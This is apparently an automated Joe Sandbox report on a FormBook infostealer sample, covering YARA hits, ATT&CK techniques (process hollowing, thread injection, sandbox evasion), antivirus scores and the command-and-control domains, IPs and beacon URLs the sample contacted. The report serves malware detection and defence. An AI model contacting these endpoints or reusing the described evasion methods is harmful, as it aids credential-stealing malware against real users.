          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.918580029.0000000003510000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.677567627.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.763395770.0000000001530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.918604632.0000000003540000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.679714687.0000000003DE9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.763453752.0000000001560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.SKlGhwkzTi.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.SKlGhwkzTi.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.SKlGhwkzTi.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.SKlGhwkzTi.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SKlGhwkzTi.exe.3de9930.1.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsCommand and Scripting Interpreter2Path InterceptionProcess Injection612Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 432735 Sample: SKlGhwkzTi Startdate: 10/06/2021 Architecture: WINDOWS Score: 100 29 www.adultpeace.com 2->29 31 adultpeace.com 2->31 47 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->47 49 Multi AV Scanner detection for domain / URL 2->49 51 Found malware configuration 2->51 53 6 other signatures 2->53 10 SKlGhwkzTi.exe 3 2->10         started        signatures3 process4 file5 27 C:\Users\user\AppData\...\SKlGhwkzTi.exe.log, ASCII 10->27 dropped 55 Tries to detect virtualization through RDTSC time measurements 10->55 57 Injects a PE file into a foreign processes 10->57 14 SKlGhwkzTi.exe 10->14         started        signatures6 process7 signatures8 59 Modifies the context of a thread in another process (thread injection) 14->59 61 Maps a DLL or memory area into another process 14->61 63 Sample uses process hollowing technique 14->63 65 Queues an APC in another process (thread injection) 14->65 17 help.exe 14->17         started        20 explorer.exe 14->20 injected process9 dnsIp10 39 Modifies the context of a thread in another process (thread injection) 17->39 41 Maps a DLL or memory area into another process 17->41 43 Tries to detect virtualization through RDTSC time measurements 17->43 23 cmd.exe 1 17->23         started        33 www.69-1hn7uc.net 163.43.122.119, 49769, 80 SAKURA-BSAKURAInternetIncJP Japan 20->33 35 biztekno.com 151.106.118.75, 49768, 80 PLUSSERVER-ASN1DE Germany 20->35 37 10 other IPs or domains 20->37 45 System process connects to network (likely due to code injection or exploit) 20->45 signatures11 process12 process13 25 conhost.exe 23->25         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SKlGhwkzTi.exe31%VirustotalBrowse
          SKlGhwkzTi.exe41%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          4.2.SKlGhwkzTi.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.0.SKlGhwkzTi.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          biztekno.com1%VirustotalBrowse
          adultpeace.com7%VirustotalBrowse
          www.69-1hn7uc.net1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.biztekno.com/p2io/?xN6x=IctutJlD1KzdQk/q9eJAOxuhjWEnlD6jXMe1IpO47rzJ4yHlcjfL6JMqKvIaYl5lDyXZ&YluDM=Ofc4YV0pThsp0%Avira URL Cloudsafe
          https://www.cyrilgraze.com/p2io/?xN6x=PONkgH6MO5ViG0%Avira URL Cloudsafe
          http://www.cyrilgraze.com/p2io/?xN6x=PONkgH6MO5ViG+zjbj4YyU3gBn/U0y1OFStIgCLmvXYcYHdxqE5/6Lr2O25ts36CozLG&YluDM=Ofc4YV0pThsp0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          www.adultpeace.com/p2io/0%URL Reputationsafe
          www.adultpeace.com/p2io/0%URL Reputationsafe
          www.adultpeace.com/p2io/0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.hiddenwholesale.com/p2io/?xN6x=es7Y2j6d/8vbylETtmEK+cycNhd4T49F/A456A8m/a4HPEjAATL8KRpgCeYlIlfO3VWH&YluDM=Ofc4YV0pThsp0%Avira URL Cloudsafe
          http://www.cleanxcare.com/p2io/?xN6x=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf04YLJeQ+Gz7y&YluDM=Ofc4YV0pThsp0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.anewdistraction.com/p2io/?xN6x=ia0dgIkdnBZILDuo3zp8eo0tNiPxoXJfkPpt6P05AAGh3ZPzSagLTNX+xDwAHOv6iOkY&YluDM=Ofc4YV0pThsp0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          biztekno.com
          151.106.118.75
          truetrueunknown
          adultpeace.com
          163.44.239.73
          truetrueunknown
          www.69-1hn7uc.net
          163.43.122.119
          truetrueunknown
          www.cyrilgraze.com
          104.21.65.7
          truetrue
            unknown
            cleanxcare.com
            78.31.67.91
            truetrue
              unknown
              centergolosinas.com
              192.169.223.13
              truetrue
                unknown
                pixie.porkbun.com
                44.227.65.245
                truefalse
                  high
                  ext-sq.squarespace.com
                  198.185.159.144
                  truefalse
                    high
                    www.hiddenwholesale.com
                    unknown
                    unknowntrue
                      unknown
                      www.cleanxcare.com
                      unknown
                      unknowntrue
                        unknown
                        www.anewdistraction.com
                        unknown
                        unknowntrue
                          unknown
                          www.biztekno.com
                          unknown
                          unknowntrue
                            unknown
                            www.centergolosinas.com
                            unknown
                            unknowntrue
                              unknown
                              www.adultpeace.com
                              unknown
                              unknowntrue
                                unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://www.biztekno.com/p2io/?xN6x=IctutJlD1KzdQk/q9eJAOxuhjWEnlD6jXMe1IpO47rzJ4yHlcjfL6JMqKvIaYl5lDyXZ&YluDM=Ofc4YV0pThsptrue
                                • Avira URL Cloud: safe
                                unknown
                                http://www.cyrilgraze.com/p2io/?xN6x=PONkgH6MO5ViG+zjbj4YyU3gBn/U0y1OFStIgCLmvXYcYHdxqE5/6Lr2O25ts36CozLG&YluDM=Ofc4YV0pThsptrue
                                • Avira URL Cloud: safe
                                unknown
                                www.adultpeace.com/p2io/true
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                low
                                http://www.hiddenwholesale.com/p2io/?xN6x=es7Y2j6d/8vbylETtmEK+cycNhd4T49F/A456A8m/a4HPEjAATL8KRpgCeYlIlfO3VWH&YluDM=Ofc4YV0pThsptrue
                                • Avira URL Cloud: safe
                                unknown
                                http://www.cleanxcare.com/p2io/?xN6x=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf04YLJeQ+Gz7y&YluDM=Ofc4YV0pThsptrue
                                • Avira URL Cloud: safe
                                unknown
                                http://www.anewdistraction.com/p2io/?xN6x=ia0dgIkdnBZILDuo3zp8eo0tNiPxoXJfkPpt6P05AAGh3ZPzSagLTNX+xDwAHOv6iOkY&YluDM=Ofc4YV0pThsptrue
                                • Avira URL Cloud: safe
                                unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://www.apache.org/licenses/LICENSE-2.0SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                  high
                                  http://www.fontbureau.comSKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.fontbureau.com/designersGSKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.fontbureau.com/designers/?SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.founder.com.cn/cn/bTheSKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designers?SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.tiro.comexplorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designersexplorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                            high
                                            http://www.goodfont.co.krSKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://www.cyrilgraze.com/p2io/?xN6x=PONkgH6MO5ViGhelp.exe, 0000000D.00000002.919483231.0000000004052000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssSKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.carterandcone.comlSKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.sajatypeworks.comSKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.typography.netDSKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.fontbureau.com/designers/cabarga.htmlNSKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                                high
                                                http://www.founder.com.cn/cn/cTheSKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.galapagosdesign.com/staff/dennis.htmSKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://fontfabrik.comSKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.founder.com.cn/cnSKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.fontbureau.com/designers/frere-user.htmlSKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://www.jiyu-kobo.co.jp/SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.galapagosdesign.com/DPleaseSKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.com/designers8SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.%s.comPAexplorer.exe, 00000006.00000000.716763832.0000000002B50000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    low
                                                    http://www.fonts.comSKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.sandoll.co.krSKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.urwpp.deDPleaseSKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.zhongyicts.com.cnSKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSKlGhwkzTi.exe, 00000000.00000002.679283133.0000000002DE1000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.sakkal.comSKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown

                                                        Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        104.21.65.7
                                                        www.cyrilgraze.comUnited States
                                                        13335CLOUDFLARENETUStrue
                                                        198.185.159.144
                                                        ext-sq.squarespace.comUnited States
                                                        53831SQUARESPACEUSfalse
                                                        151.106.118.75
                                                        biztekno.comGermany
                                                        61157PLUSSERVER-ASN1DEtrue
                                                        163.43.122.119
                                                        www.69-1hn7uc.netJapan9370SAKURA-BSAKURAInternetIncJPtrue
                                                        44.227.65.245
                                                        pixie.porkbun.comUnited States
                                                        16509AMAZON-02USfalse
                                                        78.31.67.91
                                                        cleanxcare.comGermany
                                                        24961MYLOC-ASIPBackboneofmyLocmanagedITAGDEtrue
                                                        192.169.223.13
                                                        centergolosinas.comUnited States
                                                        26496AS-26496-GO-DADDY-COM-LLCUStrue

                                                        General Information

                                                        Joe Sandbox Version:32.0.0 Black Diamond
                                                        Analysis ID:432735
                                                        Start date:10.06.2021
                                                        Start time:17:57:04
                                                        Joe Sandbox Product:CloudBasic
                                                        Overall analysis duration:0h 11m 18s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Sample file name:SKlGhwkzTi (renamed file extension from none to exe)
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                        Number of analysed new started processes analysed:19
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:1
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • HDC enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Detection:MAL
                                                        Classification:mal100.troj.evad.winEXE@8/1@8/7
                                                        EGA Information:Failed
                                                        HDC Information:
                                                        • Successful, ratio: 8.2% (good quality ratio 7.4%)
                                                        • Quality average: 73.3%
                                                        • Quality standard deviation: 31.4%
                                                        HCA Information:
                                                        • Successful, ratio: 99%
                                                        • Number of executed functions: 106
                                                        • Number of non-executed functions: 157
                                                        Cookbook Comments:
                                                        • Adjust boot time
                                                        • Enable AMSI
                                                        Warnings:
                                                        Show All
                                                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                        • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 13.88.21.125, 184.30.21.219, 92.122.145.220, 52.147.198.201, 168.61.161.212, 20.82.210.154, 20.75.105.140, 20.72.88.19, 20.54.26.129, 2.20.142.210, 2.20.142.209, 92.122.213.247, 92.122.213.194
                                                        • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, storeedgefd.xbetservices.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, eus2-consumerrp-displaycatalog-aks2aks-useast.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, storeedgefd.dsx.mp.microsoft.com, www.bing.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e16646.dscg.akamaiedge.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        17:58:05API Interceptor1x Sleep call for process: SKlGhwkzTi.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        104.21.65.76d56768e_by_Libranalysis.exeGet hashmaliciousBrowse
                                                        • www.cyrilgraze.com/p2io/?hnKP_0F0=PONkgH6MO5ViG+zjbj4YyU3gBn/U0y1OFStIgCLmvXYcYHdxqE5/6Lr2O1VXv2W5rEqXTgoC5w==&nfrxU8=yVMtB8oP
                                                        APPROVED.xlsxGet hashmaliciousBrowse
                                                        • www.cyrilgraze.com/p2io/?6lzd4R3=PONkgH6JO+VmGu/vZj4YyU3gBn/U0y1OFS1Y8BXnr3YdY2x3tUozsPT0NTVR3XOxnye2KQ==&Mj=8pGl2P
                                                        lFfDzzZYTl.exeGet hashmaliciousBrowse
                                                        • www.cyrilgraze.com/p2io/?iBIXf4M=PONkgH6MO5ViG+zjbj4YyU3gBn/U0y1OFStIgCLmvXYcYHdxqE5/6Lr2O1VXv2W5rEqXTgoC5w==&_RAd4V=YL0THJvhl8d
                                                        dw0Iro1gcR.exeGet hashmaliciousBrowse
                                                        • www.cyrilgraze.com/p2io/?0pk=FtxhArA&FjUHSn=PONkgH6MO5ViG+zjbj4YyU3gBn/U0y1OFStIgCLmvXYcYHdxqE5/6Lr2O1ZX8ma6yUqB
                                                        lfBVtTwPNQ.exeGet hashmaliciousBrowse
                                                        • www.cyrilgraze.com/p2io/?E48=PONkgH6MO5ViG+zjbj4YyU3gBn/U0y1OFStIgCLmvXYcYHdxqE5/6Lr2O1VuwH26lS2QTgoFqA==&oPqLWb=dVeDBDrHInjx
                                                        gqnTRCdv5u.exeGet hashmaliciousBrowse
                                                        • www.cyrilgraze.com/p2io/?K81d7=PONkgH6MO5ViG+zjbj4YyU3gBn/U0y1OFStIgCLmvXYcYHdxqE5/6Lr2O25ts36CozLG&uTrL=Apdlbf
                                                        g0g865fQ2S.exeGet hashmaliciousBrowse
                                                        • www.cyrilgraze.com/p2io/?4h3=PONkgH6MO5ViG+zjbj4YyU3gBn/U0y1OFStIgCLmvXYcYHdxqE5/6Lr2O25HzHKCsxDG&vTapK=LJBpc8p
                                                        loMStbzHSP.exeGet hashmaliciousBrowse
                                                        • www.cyrilgraze.com/p2io/?7nEpiRy=PONkgH6MO5ViG+zjbj4YyU3gBn/U0y1OFStIgCLmvXYcYHdxqE5/6Lr2O1VXv2W5rEqXTgoC5w==&sZvD8l=Spap-DKpf
                                                        198.185.159.144New Purchase Order20210609.exeGet hashmaliciousBrowse
                                                        • www.kokoshaveice.com/un8c/?3f-H3H=aZaLIE/CsZEbnkZXVKNJbEuElQpMoyTdbfBzj8jhRt7QilQZi3fXZMlsJ6JzgR8z/eaN&6lGd=HBZ81PLPUzqhOj
                                                        LkvumUsaQX.exeGet hashmaliciousBrowse
                                                        • www.totally-seo.com/p2io/?7ntDA=TySV6YYzJGXnavbEwOCoDLKT5SC+Z4HfI/S6WoKTLKp4rrhaLWxPw3pQ7PESKodUP59hGuNmhA==&p48x=MN6xDxf80FMxbj4
                                                        Payment slip.exeGet hashmaliciousBrowse
                                                        • www.shopkaitek.com/3edq/?2dUX-PAP=M8eNvF5zuYq6F34lAt80R5nTraHCYrh0rbrF9J+SqtSL9q0uJh3MK9H55PeJhjWLLkFu&D6Otan=1bu800r
                                                        New Order Vung Ang TPP Viet Nam.exeGet hashmaliciousBrowse
                                                        • www.kokoshaveice.com/un8c/?z8b=iZspkzE0JnS86&m6=aZaLIE/CsZEbnkZXVKNJbEuElQpMoyTdbfBzj8jhRt7QilQZi3fXZMlsJ6FzzBwwmOab/JVn8A==
                                                        tzeEeC2CBA.exeGet hashmaliciousBrowse
                                                        • www.totally-seo.com/p2io/?6lFp-=X8U4Iv&Yr0=TySV6YYzJGXnavbEwOCoDLKT5SC+Z4HfI/S6WoKTLKp4rrhaLWxPw3pQ7MooJpxvMOcw
                                                        8mnXkjPdP0.exeGet hashmaliciousBrowse
